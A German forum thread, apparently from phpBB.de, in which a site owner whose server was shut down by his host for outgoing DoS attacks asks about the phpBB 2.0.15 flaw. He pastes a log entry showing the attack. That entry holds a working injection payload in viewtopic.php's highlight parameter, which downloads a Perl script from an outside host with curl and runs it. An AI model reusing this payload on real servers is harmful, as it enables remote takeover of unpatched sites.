phpBB.de

tag,

ich habe ein billigst server paket bei strato und habe darauf ein aktuelles phpbb laufen (2.0.15). da ich seit ein paar tagen auf urlaub bin, habe ich von der neuen version nichts mitbekommen aber von bekannten erfuhr ich das meine site down ist.

also kurz bei strato angerufen und mir wurde folgendes mitgeteilt: von meiner kiste aus sollen DoS attacken ausgegangen sein, vermutlich wurde die kiste gehackt. auf die frage ob ich irgendwelche php-skripte am laufen habe, nannte ich phpbb worauf man mich auf die aktuelle lücke und ein DoS-script hinwies. auf phpbb.com lese ich nun das nicht die phpbb-server-seiten angreifen sondern angegriffen werden. selbiges lese ich nun auch hier.

achja: strato hat kurzerhand den server abgeschalten! strato hat es leider auch versäumt mir davon etwas mitzuteilen, bis montag hole man dies aber nach ... bis dahin habe ich also keinerlei chancen auf die kiste zuzugreifen...

ich bin für alle infos rund um diese lücke dankbar!

crackertracker einbauen, www.cback.de

jup, absichern werde ich das phpbb schon, nur hilft mir das im moment nicht viel weiter. ich suche informationen was an diesem DoS dran ist, wer wen DoSt, usw.


edit, nachtrag:
ich will halt nur rausfinden ob strato recht hat das mein server attacken durchgeführt hat, oder ob es wirklich sein kann das mein phpbb angegriffen wurde und somit eine abschaltung meines servers eher kontraproduktiv war.

so, kiste läuft wieder und phpbb ist gepatcht, aber ich blicke noch immer nicht durch was genau passiert ist.

in den log-files habe ich seltsame einträge wie diesen gefunden:

216.193.252.183 - - [01/Jul/2005:19:29:06 +0200] "GET
/forum/viewtopic.php?t=13&rush=cd%20/tmp;curl%20-C%20-%20http://pandor4.grat
ishost.com/lollol.txt%20>%20a.pl;perl%20a.pl&highlight=%27.%70%61%73%73%74%6
8%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2
7 HTTP/1.1" 200 6854 "-" "-"

liege ich richtig mit der annahme das der besagte bug aus 2.0.15 hier genutzt wurde um andere server anzugreifen?